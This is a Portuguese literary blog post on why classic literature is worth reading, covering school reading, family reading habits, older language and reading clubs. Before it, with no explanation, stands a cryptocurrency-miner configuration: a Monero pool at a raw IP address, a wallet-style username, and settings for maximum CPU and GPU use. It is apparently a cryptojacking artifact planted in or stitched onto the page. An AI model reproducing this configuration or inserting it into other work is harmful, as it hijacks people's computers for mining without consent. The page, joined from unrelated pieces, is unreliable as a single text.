{ "autosave": true, "donate-level": 1, "cpu": { "enabled": true, "huge-pages": true, "hw-aes": null, "priority": null, "asm": true, "max-threads-hint": 100, "max-cpu-usage": 100, "yield": false, "init": -1, "*": { "intensity": 2, "threads": 8, "affinity": -1 } }, "opencl": true, "cuda": true, "pools": [ { "coin": "monero", "algo": "cn/gpu", "url": "168.235.86.33:3393", "user": "SK_pDKo9B7rTqyPDrYeohNv5.lobogamers", "pass": "x", "tls": false, "keepalive": true, "nicehash": false } ] } Divã Literário: Por que ler clássicos hoje em dia?

Leitores do Divã

sexta-feira, 13 de janeiro de 2023

Por que ler clássicos hoje em dia?

   Você pode se surpreender, mas os clássicos da literatura tem um poder transformador na vida de uma pessoa. Um leitor nunca mais será a mesma pessoa depois de ler o primeiro clássico. Pode ser um romance, uma fábula, um conto, uma crônica muito divertida, ou mesmo uma peça teatral muito relevante, o fato é que os clássicos podem ser muito importantes no nosso dia-a-dia enquanto leitores. Mesmo com uma bagagem cultural variada e muito importante, ainda assim, os clássicos seguem sendo esnobados pelos leitores todos os dias. 

    Mas, aí você pode perguntar "por que ler clássicos quando há leituras bem mais interessantes?", ou então "sou obrigado a ler?" (essa pergunta assombra a nós, leitores e professores), e a raiz do problema pode ser bem mais profunda do que se imagina.

    Primeiramente, a falta de uma postura diferente em relação aos clássicos pode estar na forma como eles nos são apresentados. O primeiro contato com livros dessa natureza é na escola, já nas etapas da nossa educação em que somos considerados "leitores proficientes", então sempre iremos nos deparar com Machado de Assis, Lima Barreto, José de Alencar e por aí vai. Contudo, se o aluno não tiver exemplos de leitura e formação leitora na própria casa, a empreitada dos professores de apresentar os clássicos aos alunos será de cara um fracasso, ainda mais porque a escola usa os clássicos de forma avaliativa, medindo o conhecimento adquirido através da leitura. E esse não é o único problema.

    A criança, de qualquer idade, precisa de modelos de formação leitora em casa para que o gosto pela leitura e, consequentemente, pelos clássicos, possa ser estimulado. Mas não basta ser um leitor e não mostrar como os livros são importantes na vida de uma criança. É importante que os pais, ainda na infância tenra (dos 6 aos 11 anos), se acostumem a levar os filhos para a biblioteca pública, que geralmente tem esquemas de funcionamento nos fins de semana. Aproveitar as férias escolares para isso também é uma boa oportunidade para isso. Não é preciso gastar fortunas, e ainda há a chance de a formação leitora dessa criança gerar bons frutos.

            Apresentação do Livro Lucíola para projeto de leitura. 
Data: 06. Jun.2021
Fonte: arquivo pessoal

    Outra verdade que precisamos aceitar é que os clássicos também não são atraentes devido à linguagem usada pelos autores, geralmente oriundos de famílias abastadas, o que lhes permitia poder publicar suas obras sem problemas. A linguagem usada pelos autores corresponde a uma época bem mais distante de nós, alguns termos até caíram em desuso. Isso, no entanto, não anula sua validade. Os temas e aspectos abordados nos clássicos são muito atemporais, alguns valores até conseguiram sobreviver a todas as transformações sociais, então isso faz com que os clássicos sejam muito importantes para a formação leitora. Ainda que você não goste, não pode negar a importância de um clássico. 
    Contudo, há época para apreciá-los em sua mais completa beleza. A melhor forma de conhecer os clássicos é por meio dos clubes de leitura, que nos permitem entender sua relevância da forma mais completa. 
    Eu vou deixar dois vídeos aqui nesse artigo que vão dar uma ideia de como os clássicos se fazem importantes na vida de um leitor, e aí você pode tirar suas conclusões. Mas nunca se esqueça, independente da época em que foram escritos, os clássicos, no fim das contas, falam de pessoas e suas esperanças no futuro. Com essa, me despeço e até o próximo artigo. Tchau, pessoal!


 


Nenhum comentário:

Postar um comentário

Projeto Desencalhando a estante... ou conhecendo a estante?

 Um projeto que já existe desde janeiro de 2020, O projeto Desencalhando a estante , da professora Carolina Bianchezi, ajuda leitores de tod...